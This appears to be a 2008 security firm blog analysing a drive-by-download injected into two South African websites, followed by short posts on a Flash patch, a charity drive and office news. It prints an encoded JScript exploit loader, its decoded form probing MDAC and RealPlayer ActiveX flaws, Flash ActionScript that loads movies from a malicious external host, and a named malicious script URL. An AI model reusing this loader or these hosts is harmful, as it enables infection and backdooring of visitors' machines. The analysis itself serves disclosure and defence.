document.write(base64decode ("PHNjcmlwdD53aW5kb3cub25lcnJvcj1mdW5jdGlvbigpe3JldHVybiB0cnVlO308L3NjcmlwdD4NCjxTY3JpcHQgTGFuZ3VhZ2U9IkpTY3JpcHQiPg0KCXZhciBjb29rID0gInNpbGVudHdtIjsNCgkNCglmdW5jdGlvbiBzZXRDb29raWUobmFtZSwgdmFsdWUsIGV4cGlyZSkgDQoJeyAgIA0KCQl3aW5kb3cuZG9jdW1lbnQuY29va2llID0gbmFtZSArICI9IiArIGVzY2FwZSh2YWx1ZSkgKyAoKGV4cGlyZSA9PSBudWxsKSA/ICIiIDogKCI7IGV4cGlyZXM9IiArIGV4cGlyZS50b0dNVFN0cmluZygpKSk7DQoJfQ0KDQoJZnVuY3Rpb24gZ2V0Q29va2llKE5hbWUpIA0KCXsgICANCgkJdmFyIHNlYXJjaCA9IE5hbWUgKyAiPSI7DQoJCWlmICh3aW5kb3cuZG9jdW1lbnQuY29va2llLmxlbmd0aCA+IDApIA0KCQl7IA0KCQkJb2Zmc2V0ID0gd2luZG93LmRvY3VtZW50LmNvb2tpZS5pbmRleE9mKHNlYXJjaCk7DQoJCQlpZiAob2Zmc2V0ICE9IC0xKSANCgkJCXsgDQoJCQkJb2Zmc2V0ICs9IHNlYXJjaC5sZW5ndGg7ICAgICAgIA0KCQkJICBlbmQgPSB3aW5kb3cuZG9jdW1lbnQuY29va2llLmluZGV4T2YoIjsiLCBvZmZzZXQpICAgICAgIA0KCQkJICBpZiAoZW5kID09IC0xKQ0KCQkJICAgIGVuZCA9IHdpbmRvdy5kb2N1bWVudC5jb29raWUubGVuZ3RoOw0KCQkJICByZXR1cm4gdW5lc2NhcGUod2luZG93LmRvY3VtZW50LmNvb2tpZS5zdWJzdHJpbmcob2Zmc2V0LCBlbmQpKTsNCgkJCSB9DQoJCSB9DQoJICByZXR1cm4gbnVsbDsNCgl9DQoNCglmdW5jdGlvbiByZWdpc3RlcihuYW1lKSANCgl7DQoJCXZhciB0b2RheSA9IG5ldyBEYXRlKCk7DQoJCXZhciBleHBpcmVzID0gbmV3IERhdGUoKTsNCgkJZXhwaXJlcy5zZXRUaW1lKHRvZGF5LmdldFRpbWUoKSArIDEwMDAqNjAqNjAqMjQpOw0KCQlzZXRDb29raWUoY29vaywgbmFtZSwgZXhwaXJlcyk7DQoJfQ0KDQoJZnVuY3Rpb24gb3BlbldNKCkgDQoJew0KCQl2YXIgYyA9IGdldENvb2tpZShjb29rKTsNCgkJaWYgKGMgIT0gbnVsbCkgDQoJCXsNCgkgIAlyZXR1cm47DQoJCX0NCgkJDQoJCXJlZ2lzdGVyKGNvb2spOw0KCQkNCgkJd2luZG93LmRlZmF1bHRTdGF0dXM9IuWujOaIkCI7DQoJCQkNCgkJdHJ5eyB2YXIgZTsNCgkJCXZhciBhZG89KGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoIm9iamVjdCIpKTsNCgkJCWFkby5zZXRBdHRyaWJ1dGUoImNsYXNzaWQiLCJjbHNpZDpCRDk2QzU1Ni02NUEzLTExRDAtOTgzQS0wMEMwNEZDMjlFMzYiKTsNCgkJCXZhciBhcz1hZG8uY3JlYXRlb2JqZWN0KCJBZG9kYi5TdHJlYW0iLCIiKX0NCgkJY2F0Y2goZSl7fTsNCgkJZmluYWxseXsNCgkJCWlmKGUhPSJbb2JqZWN0IEVycm9yXSIpew0KCQkJCWRvY3VtZW50LndyaXRlKCI8aWZyYW1lIHdpZHRoPTUwIGhlaWdodD0wIHNyYz0xNC5odG0+PC9pZnJhbWU+Iil9DQoJCQllbHNlDQoJCQl7CQ0KCQkJCXRyeXsgdmFyIGo7DQoJCQkJCXZhciByZWFsMTE9bmV3IEFjdGl2ZVhPYmplY3QoIklFUlAiKyJDdGwuSSIrIkVSUEN0bC4xIik7fQ0KCQkJCWNhdGNoKGope307DQoJCQkJZmluYWxseXtpZihqIT0iW29iamVjdCBFcnJvcl0iKXtpZihuZXcgQWN0aXZlWE9iamVjdCgiSUVSUEN0bC5JRVJQQ3RsLjEiKS5QbGF5ZXJQcm9wZXJ0eSgiUFJPRFVDVFZFUlNJT04iKTw9IjYuMC4xNC41NTIiKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHtkb2N1bWVudC53cml0ZSgnPGlmcmFtZSB3aWR0aD0xMCBoZWlnaHQ9MCBzcmM9cmwuaHRtPjwvaWZyYW1lPicpfQ0KICAgICAgICAgICAgICAgICAgICAgICAgIGVsc2UNCiAgICAgICAgICAgICAgICAgICAgICAgICB7DQoJCQkJCWRvY3VtZW50LndyaXRlKCc8aWZyYW1lIHdpZHRoPTEwIGhlaWdodD0wIHNyYz1uZXcuaHRtPjwvaWZyYW1lPicpfX19DQoNCgkJCQkJZG9jdW1lbnQud3JpdGUoJzxpZnJhbWUgd2lkdGg9NTAgaGVpZ2h0PTAgc3JjPTA0Lmh0bT48L2lmcmFtZT4nKQ0KDQoJCQkJaWYoaj09IltvYmplY3QgRXJyb3JdIikNCgkJCQl7bG9jYXRpb24ucmVwbGFjZSgiYWJvdXQ6YmxhbmsiKTt9DQoJCQl9fQ0KCX0NCg0Kb3BlbldNKCk7DQo8L3NjcmlwdD4="));

<./script>

<./BODY>

<./HTML>

We decoded this to the following script:

<.script>window.onerror=function(){return true;}

<.Script Language="JScript">

var cook = "silentwm";

function setCookie(name, value, expire)

{

window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));

}

function getCookie(Name)

{

var search = Name + "=";

if (window.document.cookie.length > 0)

{

offset = window.document.cookie.indexOf(search);

if (offset != -1)

{

offset += search.length;

end = window.document.cookie.indexOf(";", offset)

if (end == -1)

end = window.document.cookie.length;

return unescape(window.document.cookie.substring(offset, end));

}

return null;

}

function register(name)

{

var today = new Date();

var expires = new Date();

expires.setTime(today.getTime() + 1000*60*60*24);

setCookie(cook, name, expires);

}

function openWM()

{

var c = getCookie(cook);

if (c != null)

{

return;

}

window.defaultStatus="å®æ";

try{ var e;

var ado=(document.createElement("object"));

ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

var as=ado.createobject("Adodb.Stream","")}

catch(e){};

finally{

if(e!="[object Error]"){

document.write("")}

else

{

try{ var j;

var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}

catch(j){};

finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")

{document.write('')}

else

{

document.write('')}}}

document.write('')

if(j=="[object Error]")

{location.replace("about:blank");}

}}

}

openWM();

<./script>

Bear in mind that posting this on the blog, we changed a couple of things in the src code, but in any event, you should get the idea.

So, this is quite impressive because if your personal configuration does not give any sort of errors with the creation of the Adobe.Stream object, you will be directed to 14.htm.

From this point, the malicious binary and backdoor “bak.exe” will by downloaded to your computer via the MDAC vulnerability(if you are unpatched that is).

If any sort of errors occur a Real Player “hax” will be checked for, and this includes several different versions and vulnerabilities.

Once again, if nothing is picked up and if any errors accour, you will be taken to rl.htm and your machine will be potentially backdoored. I must stress that if it fails, it will check for several different Real Player vulnerabilities, some of which are much more recent(Including heap spraying techniques). So, thanks to websites being vulnerable, the general public now have a big issue. Anyway...

Lets take a look at 123.htm:

<.script>window.onerror=function(){return true;}

<.Script Language="JScript">

var cook = "silentwm";

function setCookie(name, value, expire)

{

window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));

}

function getCookie(Name)

{

var search = Name + "=";

if (window.document.cookie.length > 0)

{

offset = window.document.cookie.indexOf(search);

if (offset != -1)

{

offset += search.length;

end = window.document.cookie.indexOf(";", offset)

if (end == -1)

end = window.document.cookie.length;

return unescape(window.document.cookie.substring(offset, end));

}

return null;

}

function register(name)

{

var today = new Date();

var expires = new Date();

expires.setTime(today.getTime() + 1000*60*60*24);

setCookie(cook, name, expires);

}

function openWM()

{

var c = getCookie(cook);

if (c != null)

{

return;

}

window.defaultStatus="å®æ";

try{ var e;

var ado=(document.createElement("object"));

ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

var as=ado.createobject("Adodb.Stream","")}

catch(e){};

finally{

if(e!="[object Error]"){

document.write("")}

else

{

try{ var j;

var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}

catch(j){};

finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")

{document.write('')}

else

{

document.write('')}}}

document.write('')

if(j=="[object Error]")

{location.replace("about:blank");}

}}

}

openWM();

<./script>

Once again, please bear in mind that the above has been edited for the blog post.

There are actually 2 separate files that have the same content as per above, but both of them are hosting malicious swf files. In addition to this if you are using different browsers different files are loaded (i.e. 4561.swf and 4562.swf).

Decompiling the flash objects brought Flash action scripts, which load other movies:

4561.swf

var fVersion = /:$version;
loadMovie('hxxp://www.woai117.cn/' + fVersion + 'i.swf', _root);
stop();

4562.swf

var fVersion = /:$version;
loadMovie('hxxp://www.woai117.cn/' + fVersion + 'f.swf', _root);
stop();

These refer to instances of swf files which are dangerous and obviously refer to the Adobe Flash Player vulnerabilities. There are also other functions which load in the Trojan “bak.exe”which refer to RDS.Datacontrol (MS06-014) which we mentioned earlier.

Please take into account the severity of this issue, and obviously the huge impact. The general end user who visits these websites are usually not up to date with versions of Realplayer, Flash and obviously Microsoft updates.

Take into account that this was also done in very little time, just to check the possible impact by visiting those two sites. If anyone wants a copy of the above files for any sort of analysis, please do let us know and we would be more than happy to send them across.

All users that visited sabc.co.za or reportstar.net in the last little while should be aware that if they had/have vulnerable versions of Realplayer/Shockwave/Microsoft MS06-014 are probably infected and carrying a backdoor. In addition to this, all the stats are well logged for the guys to see exactly what’s going on in their little game.

Adobe Flash Attacks and more..

2008-06-02T19:20:00.005+02:00

A security hole has recently been discovered in Macromedia Shockwave Flash allowing attackers to compromise machines that haven't applied the relevant patches. A large number of sites(even local co.za sites) have been compromised, and are still hosting the malicious content, this is affecting end users.

Please download the patch or the updated package and install from here:

http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash

It is critical that you apply this patch as soon as possible to avoid your machine being compromised.

More about this can be read on:

http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080527

In other news, it seems like www.sabc.co.za and www.reportstar.net were hit by instances of injection(No links added for obvious reasons). This was confirmed by several clients emailing us about it. The websites should still be visible on Google for confirmation.

The source code of www.sabc.co.za and www.reportstar.net both included:

http://www.dota11.cn/m.js - as of morning of 2nd June 2008.

You can read up more about it at:

http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=3409559&SiteID=1

Telspace charity success.

2008-05-30T17:57:00.004+02:00

Firstly we would like to say thanks to everyone who wore our T-shirts at the ITweb Security summit this year, it all worked out really well thanks to all you guys. We sponsored R20 per Person that wore a T-shirts to Johnny Long's charity foundation www.hackersforcharity.org. We also decided that since the turnaround was so great, even though all 500 were not worn, we would still donate as if all 500 were, which is fantastic.

Overall it was a great success with around 350 people wearing our shirts. The Security Summit 2008 too was amazing, and featured great talks by key-note speakers and good friends of ours Roberto Preatoni, Johnny Long and Johnny Cache.

So once again thanks to everyone who helped out.

Celebrations - Good times...

2008-05-30T16:32:00.007+02:00

Friday afternoons are always good at Telspace Systems, but specifically today! We have just received some extremely good news that caused for a bit of a celebration on our side.

Thank you to all our clients for their continuous support over the previous year, we really appreciate it and we have been working extremely hard to provide services which are unique in our market. I would like to thank our entire team for working so hard to get this point.